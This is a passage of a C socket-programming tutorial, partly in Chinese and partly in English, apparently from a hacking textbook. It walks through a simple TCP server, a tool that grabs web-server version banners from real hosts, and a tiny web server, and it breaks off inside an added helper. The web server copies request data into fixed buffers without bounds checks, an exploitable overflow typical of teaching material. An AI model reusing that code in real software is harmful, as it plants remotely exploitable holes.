在 AF_INET 套接字地址结构中使用的端口号和 IP 地址预计将遵循网络字节序，这是大端序。这与 x86 的小端序相反，因此这些值必须转换。有几个专门用于这些转换的函数，其原型定义在 netinet/in.h 和 arpa/inet.h 包含文件中。以下是这些常见字节序转换函数的摘要：

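htonl(long value) Host-to-Network Long

Converts a 32-bit integer from the host's byte order to network byte order

htons(short value) Host-to-Network Short

Converts a 16-bit integer from the host's byte order to network byte order

ntohl(long value) Network-to-Host Long

Converts a 32-bit integer from network byte order to the host's byte order

ntohs(short value) Network-to-Host Short

Converts a 16-bit integer from network byte order to the host's byte order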

为了与所有架构兼容，即使主机使用大端字节序的处理器，也应继续使用这些转换函数。
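One way to observe what these conversions do is to look at which byte ends up at the lowest memory address. The helpers first_byte_u16() and first_byte_u32() below are hypothetical names for this sketch; htons(), htonl(), and ntohs() are the standard functions.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>

/* Hypothetical helper: returns the byte stored at the lowest address of a
 * 16-bit value, that is, the byte that would go onto the wire first. */
unsigned char first_byte_u16(uint16_t value) {
   unsigned char bytes[2];
   assert(sizeof(bytes) == sizeof(value));
   memcpy(bytes, &value, sizeof(bytes));
   return bytes[0];
}

/* Hypothetical helper: same idea for a 32-bit value. */
unsigned char first_byte_u32(uint32_t value) {
   unsigned char bytes[4];
   assert(sizeof(bytes) == sizeof(value));
   memcpy(bytes, &value, sizeof(bytes));
   return bytes[0];
}
```

Port 7890 is 0x1ed2, so after htons() the first byte in memory is 0x1e on any host, whether the conversion had to swap bytes or not.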

互联网地址转换

当你看到 12.110.110.204 时，你可能会认出这是一个互联网地址（IP 版本 4）。这种熟悉的点分数字表示法是指定互联网地址的常见方式，并且有函数可以将这种表示法转换为 32 位整数，以及从 32 位整数转换回来。这些函数定义在 arpa/inet.h 包含文件中，其中两个最有用的转换函数是：

`inet_aton(char *ascii_addr, struct in_addr *network_addr)`

ASCII 到网络

此函数将包含点分数字格式 IP 地址的 ASCII 字符串转换为 in_addr 结构体，正如你所记得的，它只包含一个 32 位整数，表示网络字节顺序中的 IP 地址。

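`inet_ntoa(struct in_addr network_addr)`

Network to ASCII

This function converts the other way. It is passed an in_addr structure containing an IP address (the structure itself, by value, not a pointer to it), and the function returns a character pointer to an ASCII string containing the IP address in dotted-number format. This string is held in a statically allocated memory buffer in the function, so it can be accessed until the next call to inet_ntoa(), when the string will be overwritten.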
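A round trip through both conversion functions might look like the sketch below. The wrapper names dotted_to_host_u32() and host_u32_to_dotted() are hypothetical; copying the result of inet_ntoa() into caller-owned storage is one way to avoid surprises from its static buffer. The _DEFAULT_SOURCE define is an assumption made so that glibc declares inet_aton() even under strict compiler modes.

```c
#define _DEFAULT_SOURCE  /* assumption: lets glibc expose inet_aton() */
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Hypothetical wrapper: parses dotted-number text and stores the address
 * as a host-order 32-bit integer. Returns 1 on success, 0 on bad input. */
int dotted_to_host_u32(const char *text, uint32_t *out) {
   struct in_addr addr;
   assert(text != NULL && out != NULL);
   if (inet_aton(text, &addr) == 0)
      return 0;
   *out = ntohl(addr.s_addr);  /* s_addr is in network byte order */
   return 1;
}

/* Hypothetical wrapper: converts back to text and copies the string out of
 * inet_ntoa()'s static buffer. Returns 1 on success, 0 if out is too small. */
int host_u32_to_dotted(uint32_t value, char *out, size_t out_size) {
   struct in_addr addr;
   const char *text;
   assert(out != NULL);
   addr.s_addr = htonl(value);
   text = inet_ntoa(addr);     /* struct passed by value */
   if (strlen(text) + 1 > out_size)
      return 0;
   strcpy(out, text);
   return 1;
}
```

For the address 12.110.110.204, the host-order integer is 0x0c6e6ecc, and converting it back reproduces the same dotted string.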

简单服务器示例

展示这些函数如何使用最好的方式是通过示例。以下的服务器代码监听 7890 端口的 TCP 连接。当客户端连接时，它发送消息Hello, world!然后接收数据直到连接关闭。这是通过使用前面提到的包含文件中的套接字函数和结构来完成的，因此这些文件被包含在程序的开头。在 hacking.h 中添加了一个有用的内存转储函数，将在下一页展示。

添加到 hacking.h

// Dumps raw memory in hex byte and printable split format
void dump(const unsigned char *data_buffer, const unsigned int length) {
   unsigned char byte;
   unsigned int i, j;
   for(i=0; i < length; i++) {
      byte = data_buffer[i];
      printf("%02x ", data_buffer[i]);  // Display byte in hex.
      if(((i%16)==15) || (i==length-1)) {
         for(j=0; j < 15-(i%16); j++)
            printf("   ");
         printf("| ");
         for(j=(i-(i%16)); j <= i; j++) {  // Display printable bytes from line.
            byte = data_buffer[j];
            if((byte > 31) && (byte < 127)) // Inside printable char range
               printf("%c", byte);
            else
               printf(".");
         }
         printf("\n"); // End of the dump line (each line is 16 bytes)
      } // End if
   } // End for
}

此函数用于由服务器程序显示数据包数据。然而，由于它在其他地方也很有用，所以它被放入了 hacking.h 中。服务器程序的其余部分将在阅读源代码时进行解释。

simple_server.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "hacking.h"

#define PORT 7890 // The port users will be connecting to

int main(void) {
   int sockfd, new_sockfd;  // Listen on sockfd, new connection on new_sockfd
   struct sockaddr_in host_addr, client_addr;   // My address information
   socklen_t sin_size;
   int recv_length=1, yes=1;
   char buffer[1024];

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
      fatal("setting socket option SO_REUSEADDR");

到目前为止，程序使用socket()函数设置了一个套接字。我们想要一个 TCP/IP 套接字，所以协议族是PF_INET用于 IPv4，套接字类型是SOCK_STREAM用于流套接字。最后一个协议参数是0，因为PF_INET协议族中只有一个协议。此函数返回一个套接字文件描述符，它被存储在sockfd中。

setsockopt()函数简单地用于设置套接字选项。这个函数调用将SO_REUSEADDR套接字选项设置为true，这将允许它重新使用给定的地址进行绑定。如果没有设置此选项，当程序尝试绑定给定的端口时，如果该端口已被使用，它将失败。如果套接字没有正确关闭，它可能看起来正在使用中，所以这个选项允许套接字绑定到端口（并接管其控制权），即使它看起来正在使用中。

此函数的第一个参数是套接字（通过文件描述符引用），第二个指定了选项的级别，第三个指定了选项本身。由于SO_REUSEADDR是一个套接字级别的选项，因此级别被设置为SOL_SOCKET。在/usr/include/asm/socket.h中定义了许多不同的套接字选项。最后两个参数是指向应该设置该选项的数据的指针以及该数据的长度。数据和数据的长度是经常与套接字函数一起使用的两个参数。这使得函数能够处理各种数据，从单个字节到大型数据结构。SO_REUSEADDR选项使用 32 位整数作为其值，因此要将此选项设置为true，最后两个参数必须是指向整数值1的指针和整数的大小（这是 4 字节）。
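The pointer-plus-length convention described above works in both directions: setsockopt() takes a pointer to the value and its size, and getsockopt() can read the value back the same way. The sketch below uses hypothetical helper names, make_reusable_tcp_socket() and reuseaddr_enabled(), and assumes the environment allows creating a TCP socket.

```c
#include <assert.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

/* Hypothetical helper: creates a TCP/IPv4 socket with SO_REUSEADDR set.
 * Returns the socket file descriptor, or -1 on error. */
int make_reusable_tcp_socket(void) {
   int yes = 1;
   int fd = socket(PF_INET, SOCK_STREAM, 0);
   if (fd == -1)
      return -1;
   /* Level SOL_SOCKET, option SO_REUSEADDR, value passed by pointer+size. */
   if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) == -1) {
      close(fd);
      return -1;
   }
   return fd;
}

/* Hypothetical helper: reads the option back. Returns 1 if enabled,
 * 0 if disabled, or -1 if getsockopt() fails. */
int reuseaddr_enabled(int fd) {
   int value = 0;
   socklen_t len = sizeof(value);
   assert(fd >= 0);
   if (getsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &value, &len) == -1)
      return -1;
   return value != 0;
}
```

Reading the option back is not required by the server; it is shown here only to make the effect of the setsockopt() call visible.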

   host_addr.sin_family = AF_INET;    // Host byte order
   host_addr.sin_port = htons(PORT);  // Short, network byte order
   host_addr.sin_addr.s_addr = 0; // Automatically fill with my IP.
   memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
      fatal("binding to socket");

   if (listen(sockfd, 5) == -1)
      fatal("listening on socket");

接下来的几行设置了 host_addr 结构，用于在 bind 调用中使用。地址族是 AF_INET，因为我们使用 IPv4 和 sockaddr_in 结构。端口号设置为 PORT，它定义为 7890。这个短整数值必须转换为网络字节顺序，因此使用 htons() 函数。地址设置为 0，这意味着它将自动填充为主机的当前 IP 地址。由于 0 的值与字节顺序无关，因此不需要转换。

bind() 调用传递套接字文件描述符、地址结构和地址结构长度。此调用将套接字绑定到当前 IP 地址的 7890 端口。

listen() 调用告诉套接字监听传入的连接，并且随后的 accept() 调用实际上接受了一个传入的连接。listen() 函数将所有传入的连接放入一个后备队列中，直到 accept() 调用接受连接。listen() 调用的最后一个参数设置了后备队列的最大大小。

   while(1) {    // Accept loop.
      sin_size = sizeof(struct sockaddr_in);
      new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
      if(new_sockfd == -1)
         fatal("accepting connection");
      printf("server: got connection from %s port %d\n", 
              inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port));
      send(new_sockfd, "Hello, world!\n", 14, 0); // 14 bytes, including the newline
      recv_length = recv(new_sockfd, &buffer, 1024, 0);
      while(recv_length > 0) {
         printf("RECV: %d bytes\n", recv_length);
         dump(buffer, recv_length);
         recv_length = recv(new_sockfd, &buffer, 1024, 0);
      }
      close(new_sockfd);
   }
   return 0;
}

接下来是一个接受传入连接的循环。accept() 函数的前两个参数应该立即有意义；最后一个参数是指向地址结构大小的指针。这是因为 accept() 函数会将连接客户端的地址信息写入地址结构，并将该结构的大小写入 sin_size。对于我们的目的，大小永远不会改变，但为了使用该函数，我们必须遵守调用约定。accept() 函数返回已接受连接的新套接字文件描述符。这样，原始套接字文件描述符可以继续用于接受新的连接，而新的套接字文件描述符用于与已连接的客户端通信。

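After a connection is made, the program prints a connection message, using inet_ntoa() to convert the sin_addr address structure to a dotted-number IP string and ntohs() to convert the sin_port number from network byte order to host byte order.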

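The send() function sends the string Hello, world!\n to the new socket that describes the new connection. The final argument for the send() and recv() functions is flags, which for our purposes will always be 0.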

接下来是一个循环，它从连接接收数据并将其打印出来。recv() 函数提供了一个指向缓冲区的指针和一个从套接字读取的最大长度。该函数将数据写入传递给它的缓冲区，并返回实际写入的字节数。只要 recv() 调用继续接收数据，循环就会继续。

当编译并运行时，程序将绑定到主机的 7890 端口并等待传入的连接：

reader@hacking:~/booksrc $ gcc simple_server.c
reader@hacking:~/booksrc $ ./a.out

Telnet 客户端基本上就像一个通用的 TCP 连接客户端，因此可以通过指定目标 IP 地址和端口来连接到简单服务器。

来自远程机器

matrix@euclid:~ $ telnet 192.168.42.248 7890
Trying 192.168.42.248...
Connected to 192.168.42.248.
Escape character is '^]'.
Hello, world!
this is a test
fjsghau;ehg;ihskjfhasdkfjhaskjvhfdkjhvbkjgf

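Upon connection, the server sends the string Hello, world!, and the rest is the local character echo of me typing this is a test and a line of keyboard mashing. Since telnet is line-buffered, each of these two lines is sent to the server when ENTER is pressed. On the server side, the output shows the connection and the packets of data that were received.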

在本地机器上

reader@hacking:~/booksrc $ ./a.out 
server: got connection from 192.168.42.1 port 56971
RECV: 16 bytes
74 68 69 73 20 69 73 20 61 20 74 65 73 74 0d 0a | this is a test..
RECV: 45 bytes
66 6a 73 67 68 61 75 3b 65 68 67 3b 69 68 73 6b | fjsghau;ehg;ihsk
6a 66 68 61 73 64 6b 66 6a 68 61 73 6b 6a 76 68 | jfhasdkfjhaskjvh
66 64 6b 6a 68 76 62 6b 6a 67 66 0d 0a          | fdkjhvbkjgf..

一个 Web 客户端示例

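The telnet program works well as a client for our server, so there really isn't much reason to write a specialized client. However, there are thousands of different types of servers that accept standard TCP/IP connections. Every time you use a web browser, it makes a connection to a web server somewhere. This connection transmits the web page using HTTP, which defines a certain way to request and send information. By default, web servers run on port 80, which is listed along with many other default ports in /etc/services.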

来自/etc/services

finger    79/tcp        # Finger
finger    79/udp
http      80/tcp    www www-http  # World Wide Web HTTP

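HTTP exists in the application layer, the top layer of the OSI model. At this layer, all of the networking details have already been taken care of by the lower layers, so HTTP uses plaintext for its structure. Many other application layer protocols also use plaintext, such as POP3, SMTP, IMAP, and FTP's control channel. Since these are standard protocols, they are all well documented and easily researched. Once you know the syntax of these various protocols, you can manually talk to other programs that speak the same language. There's no need to be fluent, but knowing a few important phrases will help you when traveling to foreign servers. In the language of HTTP, requests are made using the command GET, followed by the resource path and the HTTP protocol version. For example, GET / HTTP/1.0 will request the root document from the web server using HTTP version 1.0. The request is actually for the root directory of /, but most web servers will automatically search for a default HTML document of index.html in that directory. If the server finds the resource, it will respond using HTTP by sending several headers before sending the content. If the command HEAD is used instead of GET, it will only return the HTTP headers without the content. These headers are plaintext and can usually provide information about the server. They can be retrieved manually using telnet by connecting to port 80 of a known website, then typing HEAD / HTTP/1.0 and pressing ENTER twice. In the output below, telnet is used to open a TCP/IP connection to the web server at www.internic.net. Then the HTTP application layer is manually spoken to request the headers for the main index page.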
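The request typed into telnet is just a line of text followed by an empty line, each ended by a carriage return and a newline. A sketch of building that text in C is shown below; build_head_request() is a hypothetical name, and the function only formats the request without sending it anywhere.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: writes "HEAD <path> HTTP/1.0" followed by the blank
 * line that ends the request, with both lines terminated by "\r\n".
 * Returns the request length, or -1 if the buffer is too small. */
int build_head_request(char *out, size_t out_size, const char *path) {
   int n;
   assert(out != NULL && path != NULL);
   n = snprintf(out, out_size, "HEAD %s HTTP/1.0\r\n\r\n", path);
   if (n < 0 || (size_t)n >= out_size)
      return -1;   /* output was truncated or formatting failed */
   return n;
}
```

For the path / this produces 19 bytes: the 15 characters of the request line plus two line terminators, matching what pressing ENTER twice sends through telnet.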

reader@hacking:~/booksrc $ telnet www.internic.net 80
Trying 208.77.188.101...
Connected to www.internic.net.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 14 Sep 2007 05:34:14 GMT
Server: Apache/2.0.52 (CentOS)
Accept-Ranges: bytes
Content-Length: 6743
Connection: close
Content-Type: text/html; charset=UTF-8

Connection closed by foreign host.
reader@hacking:~/booksrc $

这揭示了 web 服务器是 Apache 版本 2.0.52，甚至可以知道主机运行的是 CentOS。这对于配置文件分析可能很有用，所以让我们编写一个程序来自动化这个手动过程。

接下来的几个程序将发送和接收大量数据。由于标准套接字函数不是很友好，让我们编写一些发送和接收数据的函数。这些函数被称为 send_string() 和 recv_line()，并将添加到一个名为 hacking-network.h 的新头文件中。

正常的 send() 函数返回写入的字节数，这并不总是等于你尝试发送的字节数。send_string() 函数接受一个套接字和一个字符串指针作为参数，并确保整个字符串通过套接字发送出去。它使用 strlen() 来确定传递给它的字符串的总长度。

你可能已经注意到，简单服务器接收到的每个数据包都以字节 0x0D 和 0x0A 结尾。这就是 telnet 终止行的方式——它发送一个回车符和一个换行符。HTTP 协议也期望行以这两个字节结束。快速查看 ASCII 表可以看出，0x0D 是回车符 ('\r')，而 0x0A 是换行符 ('\n')。

reader@hacking:~/booksrc $ man ascii | egrep "Hex|0A|0D"
Reformatting ascii(7), please wait...
       Oct   Dec   Hex   Char                        Oct   Dec   Hex   Char
       012   10    0A    LF  '\n' (new line)         112   74    4A    J
       015   13    0D    CR  '\r' (carriage ret)     115   77    4D    M
reader@hacking:~/booksrc $

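The recv_line() function reads entire lines of data. It reads from the socket passed as the first argument into the buffer that the second argument points to. It continues receiving from the socket until it encounters the two line-termination bytes in sequence. Then it terminates the string and exits the function. These new functions ensure that all bytes are sent and that data is received as lines terminated by '\r\n'. They are listed below in a new include file called hacking-network.h.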

hacking-network.h

/* This function accepts a socket FD and a ptr to the null terminated
 * string to send.  The function will make sure all the bytes of the
 * string are sent.  Returns 1 on success and 0 on failure.
 */
int send_string(int sockfd, unsigned char *buffer) {
   int sent_bytes, bytes_to_send;
   bytes_to_send = strlen(buffer);
   while(bytes_to_send > 0) {
      sent_bytes = send(sockfd, buffer, bytes_to_send, 0);
      if(sent_bytes == -1)
         return 0; // Return 0 on send error.
      bytes_to_send -= sent_bytes;
      buffer += sent_bytes;
   }
   return 1; // Return 1 on success.
}

/* This function accepts a socket FD and a ptr to a destination
 * buffer.  It will receive from the socket until the EOL byte
 * sequence is seen.  The EOL bytes are read from the socket, but
 * the destination buffer is terminated before these bytes.
 * Returns the size of the read line (without EOL bytes).
 */
int recv_line(int sockfd, unsigned char *dest_buffer) {
#define EOL "\r\n" // End-of-line byte sequence
#define EOL_SIZE 2
   unsigned char *ptr;
   int eol_matched = 0;

   ptr = dest_buffer;
   while(recv(sockfd, ptr, 1, 0) == 1) { // Read a single byte.
      if(*ptr == EOL[eol_matched]) { // Does this byte match terminator?
         eol_matched++;
         if(eol_matched == EOL_SIZE) { // If all bytes match terminator,
            *(ptr+1-EOL_SIZE) = '\0'; // terminate the string.
            return strlen(dest_buffer); // Return bytes received
         }
      } else {
         eol_matched = 0;
      }
      ptr++; // Increment the pointer to the next byte.
   }
   return 0; // Didn't find the end-of-line characters.
}
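
The terminator matching used by recv_line() can be tried out without a socket. What follows is a minimal sketch and not part of hacking-network.h; the helper name line_length() is an assumption made for illustration. It applies the same counting idea to a buffer that is already in memory. Unlike recv_line(), it lets a mismatching byte start a new match, so an input such as "\r\r\n" is still recognized.

```c
#include <stddef.h>

/* Scan len bytes for the first "\r\n" sequence.  Returns the number of
 * bytes that precede the terminator, or -1 if no complete terminator
 * is present.  (Hypothetical helper, for illustration only.)
 */
long line_length(const unsigned char *data, size_t len) {
   static const char eol[] = "\r\n";  // End-of-line byte sequence
   size_t i, matched = 0;

   for(i = 0; i < len; i++) {
      if(data[i] == (unsigned char)eol[matched]) {
         matched++;
         if(matched == 2)             // Both terminator bytes seen,
            return (long)(i + 1 - 2); // so report the bytes before them.
      } else {
         // Mismatch: start over, but let this byte begin a new match.
         matched = (data[i] == (unsigned char)eol[0]) ? 1 : 0;
      }
   }
   return -1; // Didn't find the end-of-line characters.
}
```

Called on the 17 bytes of "HEAD / HTTP/1.0\r\n", the function reports a line of 15 bytes.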

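Connecting a socket to a numerical IP address is simple enough, but named addresses are commonly used for convenience. In the manual HTTP HEAD request, the telnet program automatically performed a DNS (Domain Name Service) lookup to determine that www.internic.net corresponds to the IP address 192.0.34.161. DNS is a protocol that allows an IP address to be looked up by a named address, much as a phone number can be looked up in a phone book if you know the name. Naturally, there are socket-related functions and structures made specifically for hostname lookups through DNS. These functions and structures are defined in netdb.h. A function called gethostbyname() takes a pointer to a string containing a named address and returns a pointer to a hostent structure on success, or a NULL pointer on error. The hostent structure holds the lookup information, including the numerical IP address as a 32-bit integer in network byte order. As with the inet_ntoa() function, the memory for this structure is statically allocated inside the function. The structure is shown below, as listed in netdb.h.

From /usr/include/netdb.h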

/* Description of database entry for a single host.  */
struct hostent
{
  char *h_name;     /* Official name of host.  */
  char **h_aliases;   /* Alias list.  */
  int h_addrtype;   /* Host address type.  */
  int h_length;     /* Length of address.  */
  char **h_addr_list;   /* List of addresses from name server.  */
#define h_addr  h_addr_list[0]  /* Address, for backward compatibility.  */
};

The following code demonstrates the use of the gethostbyname() function.

host_lookup.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include <netdb.h>

#include "hacking.h"

int main(int argc, char *argv[]) {
   struct hostent *host_info;
   struct in_addr *address;

   if(argc < 2) {
      printf("Usage: %s <hostname>\n", argv[0]);
      exit(1);
   }

   host_info = gethostbyname(argv[1]);
   if(host_info == NULL) {
      printf("Couldn't lookup %s\n", argv[1]);
   } else {
      address = (struct in_addr *) (host_info->h_addr);
      printf("%s has address %s\n", argv[1], inet_ntoa(*address));
   }
}

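This program accepts a hostname as its only argument and prints out the IP address. The gethostbyname() function returns a pointer to a hostent structure, which contains the IP address in the element h_addr. The pointer to this element is typecast into an in_addr pointer, which is dereferenced later for the call to inet_ntoa(), since that function expects an in_addr structure as its argument. Sample program output is shown below.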

reader@hacking:~/booksrc $ gcc -o host_lookup host_lookup.c 
reader@hacking:~/booksrc $ ./host_lookup www.internic.net
www.internic.net has address 208.77.188.101
reader@hacking:~/booksrc $ ./host_lookup www.google.com
www.google.com has address 74.125.19.103 
reader@hacking:~/booksrc $
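
The h_addr macro only exposes the first entry of h_addr_list, yet a host can have several addresses. The following sketch walks the NULL-terminated list and formats one entry as text. The helper name hostent_addr_string() is an assumption made for this example, and it uses inet_ntop() rather than inet_ntoa() so that the caller supplies the output buffer; it assumes an IPv4 (AF_INET) result.

```c
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* Format address number idx of an IPv4 hostent as dotted-quad text.
 * Returns 1 on success and 0 if idx is past the end of the list or
 * the conversion fails.  (Hypothetical helper, for illustration only.)
 */
int hostent_addr_string(const struct hostent *host, int idx,
                        char *out, size_t out_len) {
   struct in_addr addr;
   int i;

   for(i = 0; host->h_addr_list[i] != NULL; i++) { // List ends with NULL.
      if(i == idx) {
         // Copy instead of casting, to avoid alignment assumptions.
         memcpy(&addr, host->h_addr_list[i], sizeof(addr));
         return inet_ntop(AF_INET, &addr, out, (socklen_t)out_len) != NULL;
      }
   }
   return 0;
}
```

With a pointer returned by gethostbyname(), calling the helper with idx 0, 1, 2, and so on until it returns 0 lists every address the lookup produced.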

Building on this with the socket functions, creating a web server identification program is not difficult.

webserver_id.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h> // strncasecmp()
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#include "hacking.h"
#include "hacking-network.h"

int main(int argc, char *argv[]) {
   int sockfd;
   struct hostent *host_info;
   struct sockaddr_in target_addr;
   unsigned char buffer[4096];

   if(argc < 2) {
      printf("Usage: %s <hostname>\n", argv[0]);
      exit(1);
   }

   if((host_info = gethostbyname(argv[1])) == NULL)
      fatal("looking up hostname");

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   target_addr.sin_family = AF_INET;
   target_addr.sin_port = htons(80);
   target_addr.sin_addr = *((struct in_addr *)host_info->h_addr);
   memset(&(target_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1)
      fatal("connecting to target server");

   send_string(sockfd, "HEAD / HTTP/1.0\r\n\r\n");
   while(recv_line(sockfd, buffer)) {
      if(strncasecmp(buffer, "Server:", 7) == 0) {
         printf("The web server for %s is %s\n", argv[1], buffer+8);
         exit(0);
      }
   }
   printf("Server line not found\n");
   exit(1);
}

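Most of this code should make sense to you by now. The sin_addr element of the target_addr structure is filled with the address from the host_info structure, using the same typecasting and dereferencing as before. The connect() function is called to connect to port 80 of the target host, the command string is sent, and the program loops, reading each line into the buffer. The strncasecmp() function is a string comparison function from strings.h. It compares the first n bytes of two strings, ignoring case. The first two arguments are pointers to the strings, and the third argument is n, the number of bytes to compare. The function returns 0 if the strings match, so the if statement is looking for the line that starts with "Server:". When it finds that line, it skips the first eight bytes and prints the web server version information. The following listing shows the compilation and execution of the program.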

reader@hacking:~/booksrc $ gcc -o webserver_id webserver_id.c
reader@hacking:~/booksrc $ ./webserver_id www.internic.net
The web server for www.internic.net is Apache/2.0.52 (CentOS)
reader@hacking:~/booksrc $ ./webserver_id www.microsoft.com
The web server for www.microsoft.com is Microsoft-IIS/7.0
reader@hacking:~/booksrc $
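
The header matching step can be isolated into a small function. This is only a sketch; the name server_header_value() is an assumption, and instead of the fixed buffer+8 offset it skips whatever spaces or tabs follow the colon, which is a small deviation from the program above.

```c
#include <stddef.h>
#include <strings.h>

/* If line starts with "Server:" (in any letter case), return a pointer
 * to the header value; otherwise return NULL.
 * (Hypothetical helper, for illustration only.)
 */
const char *server_header_value(const char *line) {
   const char *value;

   if(strncasecmp(line, "Server:", 7) != 0) // Compare only the first 7 bytes.
      return NULL;
   value = line + 7;                         // Step past "Server:"
   while(*value == ' ' || *value == '\t')    //  and any padding after it.
      value++;
   return value;
}
```

Because the comparison ignores case, a line beginning with "server:" or "SERVER:" is matched as well.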

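A Tinyweb Server

A web server doesn't have to be much more complex than the simple server we created in the previous section. After accepting a TCP/IP connection, the web server needs to implement further layers of communication using the HTTP protocol.

The server code listed below is nearly identical to the simple server, except that the connection handling code is separated into its own function. This function handles the HTTP GET and HEAD requests that come from a web browser. The program looks for the requested resource in the local directory called webroot and sends it to the browser. If the file can't be found, the server responds with a 404 HTTP response. You may already be familiar with this response, which means File Not Found. The complete source code listing follows.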

tinyweb.c

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h> // read() and close()
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "hacking.h"
#include "hacking-network.h"

#define PORT 80   // The port users will be connecting to
#define WEBROOT "./webroot" // The web server's root directory

void handle_connection(int, struct sockaddr_in *); // Handle web requests
int get_file_size(int); // Returns the filesize of open file descriptor

int main(void) {
   int sockfd, new_sockfd, yes=1;
   struct sockaddr_in host_addr, client_addr;   // My address information
   socklen_t sin_size;

   printf("Accepting web requests on port %d\n", PORT);

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
      fatal("setting socket option SO_REUSEADDR");

   host_addr.sin_family = AF_INET;      // Host byte order
   host_addr.sin_port = htons(PORT);    // Short, network byte order
   host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.
   memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
      fatal("binding to socket");

   if (listen(sockfd, 20) == -1)
      fatal("listening on socket");

   while(1) {   // Accept loop.
      sin_size = sizeof(struct sockaddr_in);
      new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
      if(new_sockfd == -1)
         fatal("accepting connection");

      handle_connection(new_sockfd, &client_addr);
   }
   return 0;
}

/* This function handles the connection on the passed socket from the
 * passed client address.  The connection is processed as a web request,
 * and this function replies over the connected socket.  Finally, the
 * passed socket is closed at the end of the function.
 */
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr) {
   unsigned char *ptr, request[500], resource[500];
   int fd, length;

   length = recv_line(sockfd, request);

   printf("Got request from %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr),
ntohs(client_addr_ptr->sin_port), request);

   ptr = strstr(request, " HTTP/"); // Search for valid-looking request.
   if(ptr == NULL) { // Then this isn't valid HTTP.
      printf(" NOT HTTP!\n");
   } else {
      *ptr = 0; // Terminate the buffer at the end of the URL.
      ptr = NULL; // Set ptr to NULL (used to flag for an invalid request).
      if(strncmp(request, "GET ", 4) == 0)  // GET request
         ptr = request+4; // ptr is the URL.
      if(strncmp(request, "HEAD ", 5) == 0) // HEAD request
         ptr = request+5; // ptr is the URL.

      if(ptr == NULL) { // Then this is not a recognized request.
         printf("\tUNKNOWN REQUEST!\n");
      } else { // Valid request, with ptr pointing to the resource name
         if (ptr[strlen(ptr) - 1] == '/')  // For resources ending with '/',
            strcat(ptr, "index.html");     // add 'index.html' to the end.
         strcpy(resource, WEBROOT);     // Begin resource with web root path
         strcat(resource, ptr);         //  and join it with resource path.
         fd = open(resource, O_RDONLY, 0); // Try to open the file.
         printf("\tOpening \'%s\'\t", resource);
         if(fd == -1) { // If file is not found
            printf(" 404 Not Found\n");
            send_string(sockfd, "HTTP/1.0 404 NOT FOUND\r\n");
            send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
            send_string(sockfd, "<html><head><title>404 Not Found</title></head>");
            send_string(sockfd, "<body><h1>URL not found</h1></body></html>\r\n");
         } else {      // Otherwise, serve up the file.
            printf(" 200 OK\n");
            send_string(sockfd, "HTTP/1.0 200 OK\r\n");
            send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
            if(ptr == request + 4) { // Then this is a GET request
               if( (length = get_file_size(fd)) == -1)
                  fatal("getting resource file size");
               if( (ptr = (unsigned char *) malloc(length)) == NULL)
                  fatal("allocating memory for reading resource");
               read(fd, ptr, length); // Read the file into memory.
               send(sockfd, ptr, length, 0);  // Send it to socket.
               free(ptr); // Free file memory.
            }
            close(fd); // Close the file.
         } // End if block for file found/not found.
      } // End if block for valid request.
   } // End if block for valid HTTP.
   shutdown(sockfd, SHUT_RDWR); // Close the socket gracefully.
}

/* This function accepts an open file descriptor and returns
 * the size of the associated file.  Returns -1 on failure.
 */
int get_file_size(int fd) {
   struct stat stat_struct;

   if(fstat(fd, &stat_struct) == -1)
      return -1;
   return (int) stat_struct.st_size;
}

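The handle_connection function uses the strstr() function to look for the substring HTTP/ in the request buffer. The strstr() function returns a pointer to the substring, which will be right at the end of the request. The string is terminated there, and HEAD and GET requests are recognized as processable requests. A HEAD request returns only the headers, while a GET request also returns the requested resource (if it can be found).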
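
The request-line handling just described can be sketched as a stand-alone function. The function name parse_request_line() and the REQ_ constants are assumptions introduced for this example; tinyweb itself keeps the logic inline and uses the pointer value to tell GET from HEAD.

```c
#include <string.h>

enum { REQ_INVALID = 0, REQ_GET = 1, REQ_HEAD = 2 };

/* Classify an HTTP request line and point *resource at the URL part.
 * The buffer is modified: it is terminated where " HTTP/" begins.
 * (Hypothetical helper, for illustration only.)
 */
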